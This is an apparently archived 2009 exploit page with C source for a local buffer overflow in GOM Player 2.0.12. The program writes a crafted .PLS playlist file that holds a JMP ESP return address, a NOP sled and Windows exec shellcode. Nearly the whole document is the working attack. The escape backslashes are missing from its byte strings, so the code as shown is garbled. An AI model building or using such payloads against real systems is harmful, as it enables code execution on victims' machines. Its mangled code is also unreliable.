GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit
# Published : 2009-01-30
# Author : Stack
# Previous Title : Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
# Next Title : Total Video Player 1.3.7 (.m3u) Local Buffer Overflow Exploit

/*------------------------------------------------
*  GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit
*-------------------------------------------------
* Discoverd & Exploited:Mountassif Moad
* http://v4-Team.com & v4 Team & Evil Finger
* Stack(at)hotmail(dot).fr
*
* NOTIFICATION:
* The vulnerabilty Poc was reported by Parvez Anwar in Secuina http://secunia.com/advisories/23994
* by (.ASX) file after that DATA_SNIPER exploit it in http://www.milw0rm.com/exploits/7702
* and this a news exploit for (.PLS) file Exploited By Stack idea of exploit inspired from DATA_SNIPER
*  Thnx all friends
*/
#include <stdio.h>
#include <windows.h>
unsigned char Header1[] =  /*PLS Fist sentence format HEx 16 Bit */
"x5bx70x6cx61x79x6cx69x73x74x5d"
"x0dx0ax0dx0ax4ex75x6dx62x65x72"
"x4fx66x45x6ex74x72x69x65x73x3d"
"x31x0dx0ax0dx0ax46x69x6cx65x31"
"x3dx68x74x74x70x3ax2fx2f";;
unsigned char Header2[] ="x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20";
/*windows/exec - 144 bytes,Encoder: CMD=calc*/
unsigned char Shell[] =
"x31xc9xbdx90xb7x29xb8xd9xf7xd9x74x24xf4xb1x1e"
"x58x31x68x11x03x68x11x83xe8x6cx55xdcx44x64xde"
"x1fxb5x74x54x5ax89xffx16x60x89xfex09xe1x26x18"
"x5dxa9x98x19x8ax1fx52x2dxc7xa1x8ax7cx17x38xfe"
"xfax57x4fxf8xc3x92xbdx07x01xc9x4ax3cxd1x2axb7"
"x36x3cxb9xe8x9cxbfx55x70x56xb3xe2xf6x37xd7xf5"
"xe3x43xfbx7exf2xb8x8axddxd1x3ax4fx82x28xb5x2f"
"x6bx2fxb2xe9xa3x24x84xf9x48x4ax19xacxc4xc3x29"
"x27x22x90xeax5dx83xffx94x79xc1x73x01xe1xf8xfe"
"xdfx46xfax18xbcx09x68x84x43";
int main( int argc, char **argv ) {
char payload[4563];
char junk[4171];
unsigned char RET_Univ[] = "x5Dx38x82x7C"; // JMP ESP in GOM.exe this make it universal
/*This is RET_sp2 FR = "x5Dx38x82x7C" /*  JMP ESP in kernel32.dll XP SP2 fr */
unsigned char nop[] = "x90x90x90x90x90x90x90x90"; //Nops
FILE *f;
printf("GOM Player 2.0.12 (.pls) Universal Buffer Overflow Exploitrn");
printf("---------------------------------------------------rn");
memset(junk, 0x41, 4171);
printf("[_] Building Exploit..rn");
memcpy( payload, Header1, sizeof( Header1 ) - 1 );
memcpy( payload + sizeof( Header1 ) - 1, junk, 4172 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)-1, RET_Univ, 4 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)-2, nop, sizeof(nop)-1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(nop)+sizeof(RET_Univ)-3, Shell, sizeof( Shell ) - 1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)+sizeof(nop)+ sizeof(Shell)-4, Header2, sizeof( Header2 ) - 1 );
f = fopen( "GAZA.pls", "wb" );
if ( f == NULL ) {
printf("[_] Cannot create filen");
return 0;
}
fwrite( payload, 1, sizeof(payload) , f );
fclose( f );
    printf("[_] GAZA.Pls file Created,Credit: Stack :)rn");
return 0;
}

// www.Syue.com [2009-01-30]